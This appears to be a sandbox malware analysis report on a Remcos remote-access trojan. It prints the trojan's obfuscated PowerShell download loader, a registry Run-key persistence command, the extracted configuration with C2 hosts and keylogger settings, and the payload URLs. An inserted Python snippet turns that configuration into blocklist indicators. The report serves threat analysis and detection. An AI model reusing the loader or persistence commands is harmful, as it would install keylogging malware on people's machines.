"Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ProcessId: 8992, ProcessName: reg.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8872, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ProcessId: 8948, ProcessName: cmd.exe
Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems), Data: Details: %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stagenes
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau 
oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8048, ProcessName: svchost.exe
No Snort rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: jgbours284hawara01.duckdns.orgAvira URL Cloud: Label: malware
              Source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: jgbours284hawara01.duckdns.orgVirustotal: Detection: 15%
              Source: www.duelvalenza.itVirustotal: Detection: 5%
              Source: http://www.duelvalenza.it/Virustotal: Detection: 5%
              Source: http://87.121.105.163Virustotal: Detection: 21%
              Source: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/Virustotal: Detection: 6%
              Source: Teklif talebi BAKVENTA-BAKUUsurpationens.cmdVirustotal: Detection: 9%
              Source: Yara matchFile source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2275976188.00000000035BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007B15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdbpX) source: powershell.exe, 00000005.00000002.2306982846.0000000007B45000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb'$ source: powershell.exe, 00000005.00000002.2306982846.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp
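The configuration the extractor printed above is the most actionable part of this section, but its C2 list was emitted with the separator between entries lost, so the three host:port:password records run together. The following is an added example, not code from the report or from Joe Sandbox: it loads the JSON exactly as the report shows it, splits the C2 field by pattern, and returns the indicators an analyst would push to blocklists and detections (hosts, ports, mutex, keylog file name, Run-key hives). The only assumption is that passwords are digit runs, which is true of this sample ("0" and "1"); a sample with alphanumeric passwords would need the original separator.

```python
"""Turn the Remcos configuration printed by the report's extractor into IOCs.

Added example, not code from the report or from Joe Sandbox. The JSON below is
copied verbatim from the "Malware Configuration Extractor" line.
"""
import json
import re
from typing import Dict, List, NamedTuple

REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}'''

# ASSUMPTION: every password in this sample is a run of digits ("0" / "1"), so a
# digit run followed by a letter marks the boundary with the next hostname.
C2_RE = re.compile(
    r"(?P<host>[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)"   # hostname with at least one dot
    r":(?P<port>\d{1,5})"
    r":(?P<password>\d+)"
)


class C2(NamedTuple):
    host: str
    port: int
    password: str


def c2_entries(host_field: str) -> List[C2]:
    """Split the concatenated Host:Port:Password field into records."""
    return [C2(m["host"], int(m["port"]), m["password"]) for m in C2_RE.finditer(host_field)]


def iocs(config_json: str) -> Dict[str, object]:
    """Reduce the extracted config to the indicators worth deploying."""
    cfg = json.loads(config_json)
    entries = c2_entries(cfg["Host:Port:Password"])
    return {
        "c2": entries,
        "hosts": sorted({e.host for e in entries}),
        "ports": sorted({e.port for e in entries}),
        "mutex": cfg["Mutex"],                 # the mutant wab.exe creates, per the report
        "keylog_file": cfg["Keylog file"],     # the DROPPED file under AppData\Roaming, per the report
        "run_keys": [h for h in ("HKCU", "HKLM") if cfg[f"Setup {h}\\Run"] == "Enable"],
    }


def is_c2_port(port: int, config_json: str) -> bool:
    """Triage check: does an observed destination port match the configured C2 ports?"""
    return port in iocs(config_json)["ports"]


if __name__ == "__main__":
    for key, value in iocs(REMCOS_CONFIG_JSON).items():
        print(f"{key}: {value}")
```

The second `jgbours284hawara01` entry on port 3051 is a fallback port, not a second server; the outbound connection to 45.88.90.110:3050 recorded under Networking matches the first configured port, which `is_c2_port` confirms.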

              Networking

              Source: Malware configuration extractorURLs: jgbours284hawara01.duckdns.org
              Source: unknownDNS query: name: jgbours284hawara01.duckdns.org
              Source: unknownDNS query: name: jgbours284hawara02.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.4:49753 -> 45.88.90.110:3050
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 45.88.90.110 45.88.90.110
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163 (48 identical entries collapsed)
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: duelvalenza.itCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /Terminaljob.toc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wnnSAFMWPwDXGy95.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: google.com
              Source: global trafficDNS traffic detected: DNS query: duelvalenza.it
              Source: global trafficDNS traffic detected: DNS query: www.duelvalenza.it
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 15:21:54 GMTServer: ApacheExpires: Mon, 26 Jul 1997 05:00:00 GMTCache-Control: post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: PHPSESSID=d979cfhj3obh8us97avdsfs160; path=/Set-Cookie: FrontSession=3c980817fa90cc22daee2c4e083b8971; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/Set-Cookie: FrontSession=7d75569e99f6cec2e2439fa4dd313439; expires=Thu, 02-May-2024 19:21:54 GMT; Max-Age=14400; path=/Last-Modified: Thu, 02 May 2024 15:21:54 GMTVary: Accept-EncodingCache-Control: private, must-revalidateKeep-Alive: timeout=1, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html;charset=UTF-8Data Ascii: 3045<!DOCTYPE html><html lang=en class=document-loading><head><meta charset=UTF-8 /><meta class=viewport name=viewport content="width=device-width, initial-scale=1.0" /><meta name=format-detection content="telephone=no" /><meta http-equiv=X-UA-Compatible content="IE=edge" /><title>Page not found</title><meta name=description content="" /><meta property="og:title" content="Page not found" /><meta property="og:description" content="" /><meta property="og:url" content="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/" /><meta pro
              Source: powershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2384493968.00000210AD0A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
              Source: powershell.exe, 00000002.00000002.2384493968.00000210ACEBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Terminaljob.tocP
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Terminaljob.tocXRul
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/wnnSAFMWPwDXGy95.bin
              Source: powershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
              Source: powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microW
              Source: svchost.exe, 00000008.00000002.2883770137.000002087C800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000008.00000002.2883966985.000002087C887000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2884761464.000002087CB90000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2445853182.000002087CA22000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2883326968.0000020877D02000.00000004.00000020.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA38000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CA6D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000008.00000002.2883966985.000002087C89A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
              Source: svchost.exe, 00000008.00000002.2883966985.000002087C887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
              Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp4
              Source: wab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp7
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp938=
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH=
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: wab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/k
              Source: powershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/
              Source: wab.exe, 0000000F.00000003.2220389190.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/eU
              Source: wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/nkF
              Source: wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.2220370209.0000000005A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin
              Source: wab.exe, 0000000F.00000003.2220389190.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin3
              Source: wab.exe, 0000000F.00000003.2208059166.0000000005A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binI
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binM
              Source: powershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/wnnSAFMWPwDXGy95.bin
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/wnnSAFMWPwDXGy95.binKJ
              Source: wab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/wnnSAFMWPwDXGy95.binhttp://87.121.105.163/wnnSAFMWPwDXGy95.bin
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2384493968.00000210AE111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
